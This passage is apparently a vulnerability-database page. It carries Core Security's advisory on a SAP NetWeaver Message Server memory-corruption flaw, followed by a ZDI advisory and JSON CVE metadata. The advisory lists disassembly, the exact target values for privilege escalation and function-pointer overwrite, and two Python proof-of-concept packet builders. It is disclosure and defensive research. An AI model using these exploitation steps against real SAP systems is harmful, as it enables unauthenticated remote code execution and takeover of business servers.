/----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends
-----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below:
/----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1
.text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ;
.text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ;
.text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ;
.text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ;
.text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx
[...]
-----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives:
/----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8]
-----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server.
A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below:
/----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends
-----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client:
/----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed
-----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0':
/----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r
-----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0':
/----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...
-----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server.
After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation:
- Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections.
- Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server.
8.1.1. Gaining remote code execution by overwriting function pointers
Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet.
One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters:
/----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]
; function pointers associated to the modification of the "ms/max_sleep"
parameter
.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER
; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost>
[...]
-----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set').
After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function:
/----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer
-----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array.
8.1.2. Modify the configuration and behavior of the server
After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps:
- Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'.
- Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver Message Server will start listening on the specified port, waiting for connections from instances of the msmon.exe monitoring program [4].
The following python code can be used to trigger the vulnerability:
/----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE*\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd
crash+=
"ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash)
print "[*] Crash sent !"
-----/
8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module.
The following python code can be used to trigger the vulnerability:
/----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE*\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd
crash+= "AD-EYECATCH\x00"
crash+= "\x01\x01"
crash+= "%11d" % 104
crash+= "%11d" % 1
crash+= "\x15\x00\x00\x00"
crash+= "\x20\x00\x00\xc8"
crash+= "LALA" + ' '*(20-4)
crash+= "LOLO" + ' '*(40-4)
crash+= " "*36
send_packet(connection, crash)
print "[*] Crash sent !"
-----/
- Report Timeline . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd,
-
2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published.
-
References
[1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm.
[4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm.
[5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/.
- About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012
-
-- CVE ID:
-
-- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C
-
-- Affected Vendors: SAP
-
-- Affected Products: SAP NetWeaver
-
-- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407.
-
-- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40
-
-- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory
-
-- Credit: This vulnerability was discovered by:
-
e6af8de8b1d4b2b6d5ba2610cbf9cd38
-
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8
wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-0832",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": null,
"trust": 2.1,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "2004s"
},
{
"model": "netweaver abap",
"scope": null,
"trust": 1.2,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.01 sr1"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.02 sp06"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.30 sp04"
},
{
"model": "netweaver abap null",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "*"
},
{
"model": "netweaver 2004s",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.01:sr1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:sp06:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:sp04:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:2004s:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "e6af8de8b1d4b2b6d5ba2610cbf9cd38",
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
}
],
"trust": 2.1
},
"cve": "CVE-2013-1592",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2013-1592",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "ZDI-12-112",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-111",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-104",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29348194-1f62-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-1592",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-1592",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "ZDI",
"id": "ZDI-12-112",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-111",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-104",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2013-1592",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw 